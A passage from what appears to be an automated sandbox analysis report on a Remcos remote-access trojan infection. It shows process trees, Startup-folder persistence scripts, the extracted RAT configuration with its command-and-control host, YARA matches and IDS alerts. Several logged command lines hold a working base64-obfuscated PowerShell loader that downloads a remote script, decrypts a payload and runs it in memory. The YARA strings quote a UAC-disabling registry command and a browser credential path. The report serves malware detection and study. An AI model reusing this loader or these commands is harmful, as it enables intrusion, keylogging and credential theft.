aUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZHVnc2QuQ29weVRvKCRvY2tpeSk7CSRkdWdzZC5EaXNwb3NlKCk7CSR1a2Nhay5EaXNwb3NlKCk7CSRvY2tpeS5EaXNwb3NlKCk7CSRvY2tpeS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGluZmRlKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR0ZHFzcD1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJG5heXJxPSR0ZHFzcC5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRuYXlycS5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JHNtaCA9ICRlbnY6VVNFUk5BTUU7JHZhbHhrID0gJ0M6XFVzZXJzXCcgKyAkc21oICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkdmFseGs7JG5zYnR1PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSgkdmFseGspLlNwbGl0KFtFbnZpcm9ubWVudF06Ok5ld0xpbmUpO2ZvcmVhY2ggKCRxenkgaW4gJG5zYnR1KSB7CWlmICgkcXp5LlN0YXJ0c1dpdGgoJzo6JykpCXsJCSRrcmNmYT0kcXp5LlN1YnN0cmluZygyKTsJCWJyZWFrOwl9fSRjZXpqbT1bc3RyaW5nW11dJGtyY2ZhLlNwbGl0KCdcJyk7SUVYICckdWltZXk9ZW11cnUgKHRibnhmIChbQUJDQ0FCQ29BQkNuQUJDdkFCQ2VBQkNydF06OkFCQ0ZBQkNyQUJDb0FCQ21BQkNCQUJDYUFCQ3NlNkFCQzRBQkNTQUJDdEFCQ3JpQUJDbkFCQ2dBQkMoJGNlemptWzBdKSkpOycuUmVwbGFjZSgnQUJDJywgJycpO0lFWCAnJHlseGFnPWVtdXJ1ICh0Ym54ZiAoW0FCQ0NBQkNvQUJDbkFCQ3ZBQkNlQUJDckFCQ3RdOjpBQkNGQUJDckFCQ29BQkNtQUJDQkFCQ2FBQkNzQUJDZUFCQzZBQkM0QUJDU0FCQ3RyQUJDaUFCQ25BQkNnKCRjZXpqbVsxXSkpKTsnLlJlcGxhY2UoJ0FCQycsICcnKTtpbmZkZSAkdWltZXkgJG51bGw7aW5mZGUgJHlseGFnICgsW3N0cmluZ1tdXSAoJyVBQkMnKSk7')) | Invoke-Expression" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • cmd.exe (PID: 8116 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_6a9840ce.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 8152 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7104 cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_6a9840ce.cmd" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6788 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 6860 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('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')) | Invoke-Expression" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • cmd.exe (PID: 340 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_2a9205f0.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 5928 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7684 cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_2a9205f0.cmd" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 4148 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
{"Host:Port:Password": ["abokirem.duckdns.org:56379:1"], "Assigned name": "Aboki", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-J4I3IV", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
Source | Rule | Description | Author | Strings
C:\ProgramData\remcos\logs.dat | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |

Source | Rule | Description | Author | Strings
00000035.00000002.3010363046.0000000008EB7000.00000002.10000000.00040000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |
0000003A.00000002.3443687584.0000000008D0C000.00000002.10000000.00040000.00000000.sdmp | Windows_Trojan_Remcos_b296e965 | unknown | unknown |
  • 0x708:$a1: Remcos restarted by watchdog!
  • 0xc80:$a3: %02i:%02i:%02i:%03i
0000002F.00000002.2572521172.0000000005EE8000.00000040.00000800.00020000.00000000.sdmp | Windows_Trojan_Donutloader_f40e3759 | unknown | unknown |
  • 0x7aa5a:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
0000002A.00000002.2399349513.00000000066F4000.00000040.00000800.00020000.00000000.sdmp | Windows_Trojan_Donutloader_f40e3759 | unknown | unknown |
  • 0x7a272:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
00000019.00000002.1875086180.0000000002D29000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |
Source | Rule | Description | Author | Strings
15.2.powershell.exe.8c91288.2.unpack | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security |
15.2.powershell.exe.8c91288.2.unpack | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |
15.2.powershell.exe.8c91288.2.unpack | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security |
15.2.powershell.exe.8c91288.2.unpack | Windows_Trojan_Remcos_b296e965 | unknown | unknown |
  • 0x69308:$a1: Remcos restarted by watchdog!
  • 0x69880:$a3: %02i:%02i:%02i:%03i
15.2.powershell.exe.8c91288.2.unpack | REMCOS_RAT_variants | unknown | unknown |
  • 0x63594:$str_a1: C:\Windows\System32\cmd.exe
  • 0x63510:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x63510:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x63a10:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
  • 0x64010:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
  • 0x63604:$str_b2: Executing file:
  • 0x6444c:$str_b3: GetDirectListeningPort
  • 0x63e00:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
  • 0x63f80:$str_b7: \update.vbs
  • 0x6362c:$str_b9: Downloaded file:
  • 0x63618:$str_b10: Downloading file:
  • 0x636bc:$str_b12: Failed to upload file:
  • 0x64414:$str_b13: StartForward
  • 0x64434:$str_b14: StopForward
  • 0x63ed8:$str_b15: fso.DeleteFile "
  • 0x63e6c:$str_b16: On Error Resume Next
  • 0x63f08:$str_b17: fso.DeleteFolder "
  • 0x636ac:$str_b18: Uploaded file:
  • 0x6366c:$str_b19: Unable to delete:
  • 0x63ea0:$str_b20: while fso.FileExists("
  • 0x63b49:$str_c0: [Firefox StoredLogins not found]

System Summary

Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('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
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('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
Source: Process started; Author: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix); Data: Command: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('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
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\eguw", CommandLine: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\user\AppData\Local\Temp\eguw", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiB0Ym54ZigkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnOVZ1Sk54T3dDdTh6b1JRU2pyVi9XL2xObzVaR05qUW02SEZ6MXVoazRWUT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnY2pTTW92SXB3MGpxdUZpbDh4VFEvUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV9
2YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlbXVydSgkcGFyYW1fdmFyKXsJSUVYICckdWtjYWs9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckb2NraXk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkdWdzZD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR1a2NhaywgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZHVnc2QuQ29weVRvKCRvY2tpeSk7CSRkdWdzZC5EaXNwb3NlKCk7CSR1a2Nhay5EaXNwb3NlKCk7CSRvY2tpeS5EaXNwb3NlKCk7CSRvY2tpeS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGluZmRlKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR0ZHFzcD1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJG5heXJxPSR0ZHFzcC5BQkNFQUJ
              Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiB0Ym54ZigkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnOVZ1Sk54T3dDdTh6b1JRU2pyVi9XL2xObzVaR05qUW02SEZ6MXVoazRWUT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnY2pTTW92SXB3MGpxdUZpbDh4VFEvUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlbXVydSgkcGFyYW1fdmFyKXsJSUVYICckdWtjYWs9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckb2NraXk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkdWdzZD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR1a2NhaywgW0lPL
kNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZHVnc2QuQ29weVRvKCRvY2tpeSk7CSRkdWdzZC5EaXNwb3NlKCk7CSR1a2Nhay5EaXNwb3NlKCk7CSRvY2tpeS5EaXNwb3NlKCk7CSRvY2tpeS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGluZmRlKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR0ZHFzcD1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJG5heXJxPSR0ZHFzcC5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRuYXlycS5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JHNtaCA9ICRlbnY6VVNFUk5BTUU7JHZhbHhrID0gJ0M6XFVzZXJzXCcgKyAkc21oICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkdmFseGs7JG5zYnR1PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSgkdmFseGspLlNwbGl0KFtFbnZpcm9ubWVudF06Ok5ld0xp
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('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

              Data Obfuscation

              Source: File created | Author: Joe Security | Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7612, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_8b2957c5.cmd

              Stealing of Sensitive Information

              Source: File created | Author: Joe Security | Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7612, TargetFilename: C:\ProgramData\remcos\logs.dat

              Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
              2025-02-11T16:44:47.326073+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 49763 | 37.120.208.40 | 56379 | TCP
              2025-02-11T16:44:51.466725+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.11 | 49788 | 37.120.208.40 | 56379 | TCP
              2025-02-11T16:44:51.005874+0100 | 2803304 | 3 | Unknown Traffic | 192.168.2.11 | 49794 | 178.237.33.50 | 80 | TCP
              2025-02-11T16:44:44.598876+0100 | 1810000 | 2 | Potentially Bad Traffic | 192.168.2.11 | 49749 | 168.119.145.117 | 443 | TCP
              2025-02-11T16:45:01.112098+0100 | 1810000 | 2 | Potentially Bad Traffic | 192.168.2.11 | 49857 | 168.119.145.117 | 443 | TCP
              2025-02-11T16:45:14.615270+0100 | 1810000 | 2 | Potentially Bad Traffic | 192.168.2.11 | 49936 | 168.119.145.117 | 443 | TCP
              2025-02-11T16:45:27.551520+0100 | 1810000 | 2 | Potentially Bad Traffic | 192.168.2.11 | 49975 | 168.119.145.117 | 443 | TCP
              2025-02-11T16:45:41.309490+0100 | 1810000 | 2 | Potentially Bad Traffic | 192.168.2.11 | 49977 | 168.119.145.117 | 443 | TCP
              2025-02-11T16:45:54.872761+0100 | 1810000 | 2 | Potentially Bad Traffic | 192.168.2.11 | 49978 | 168.119.145.117 | 443 | TCP
              2025-02-11T16:46:09.150870+0100 | 1810000 | 2 | Potentially Bad Traffic | 192.168.2.11 | 49979 | 168.119.145.117 | 443 | TCP
              2025-02-11T16:46:22.952533+0100 | 1810000 | 2 | Potentially Bad Traffic | 192.168.2.11 | 49980 | 168.119.145.117 | 443 | TCP
              2025-02-11T16:46:41.711257+0100 | 1810000 | 2 | Potentially Bad Traffic | 192.168.2.11 | 49981 | 168.119.145.117 | 443 | TCP
              2025-02-11T16:46:59.180008+0100 | 1810000 | 2 | Potentially Bad Traffic | 192.168.2.11 | 49982 | 168.119.145.117 | 443 | TCP
              2025-02-11T16:47:15.635347+0100 | 1810000 | 2 | Potentially Bad Traffic | 192.168.2.11 | 49983 | 168.119.145.117 | 443 | TCP
              2025-02-11T16:47:32.598920+0100 | 1810000 | 2 | Potentially Bad Traffic | 192.168.2.11 | 49984 | 168.119.145.117 | 443 | TCP
              2025-02-11T16:47:51.346525+0100 | 1810000 | 2 | Potentially Bad Traffic | 192.168.2.11 | 49985 | 168.119.145.117 | 443 | TCP
              2025-02-11T16:48:10.458180+0100 | 1810000 | 2 | Potentially Bad Traffic | 192.168.2.11 | 49986 | 168.119.145.117 | 443 | TCP
              2025-02-11T16:48:28.334790+0100 | 1810000 | 2 | Potentially Bad Traffic | 192.168.2.11 | 49987 | 168.119.145.117 | 443 | TCP
              2025-02-11T16:48:47.915327+0100 | 1810000 | 2 | Potentially Bad Traffic | 192.168.2.11 | 49988 | 168.119.145.117 | 443 | TCP
              2025-02-11T16:49:02.915450+0100 | 1810000 | 2 | Potentially Bad Traffic | 192.168.2.11 | 49989 | 168.119.145.117 | 443 | TCP
              2025-02-11T16:49:15.496308+0100 | 1810000 | 2 | Potentially Bad Traffic | 192.168.2.11 | 49990 | 168.119.145.117 | 443 | TCP

              AV Detection

              Source: 15.2.powershell.exe.8c91288.2.raw.unpack | Malware Configuration Extractor: Remcos {"Host:Port:Password": ["abokirem.duckdns.org:56379:1"], "Assigned name": "Aboki", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-J4I3IV", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
              Source: Yara match | File source: 15.2.powershell.exe.8c91288.2.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 15.2.powershell.exe.8c91288.2.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: Process Memory Space: powershell.exe PID: 4532, type: MEMORYSTR
              Source: Yara match | File source: Process Memory Space: powershell.exe PID: 3376, type: MEMORYSTR
              Source: Yara match | File source: Process Memory Space: powershell.exe PID: 3656, type: MEMORYSTR
              Source: Yara match | File source: Process Memory Space: powershell.exe PID: 7536, type: MEMORYSTR
              Source: Yara match | File source: Process Memory Space: powershell.exe PID: 2940, type: MEMORYSTR
              Source: Yara match | File source: Process Memory Space: powershell.exe PID: 5332, type: MEMORYSTR
              Source: Yara match | File source: Process Memory Space: powershell.exe PID: 7096, type: MEMORYSTR
              Source: Yara match | File source: Process Memory Space: powershell.exe PID: 7100, type: MEMORYSTR
              Source: Yara match | File source: Process Memory Space: powershell.exe PID: 2540, type: MEMORYSTR
              Source: Yara match | File source: Process Memory Space: powershell.exe PID: 5568, type: MEMORYSTR
              Source: Yara match | File source: Process Memory Space: powershell.exe PID: 8008, type: MEMORYSTR
              Source: Yara match | File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
              Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.4% probability
              Source: powershell.exe, 0000000F.00000002.1629594619.0000000008C90000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: -----BEGIN PUBLIC KEY-----memstr_333593b5-f

              Exploits

              Source: Yara match | File source: 15.2.powershell.exe.8c91288.2.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 15.2.powershell.exe.8c91288.2.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 0000000F.00000002.1629594619.0000000008C90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 0000000F.00000002.1630316230.0000000008D68000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: Process Memory Space: powershell.exe PID: 4532, type: MEMORYSTR
              Source: unknown | HTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.11:49749 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.11:49857 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.11:49936 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.11:49975 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.11:49977 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.11:49978 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.11:49979 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.11:49980 version: TLS 1.2
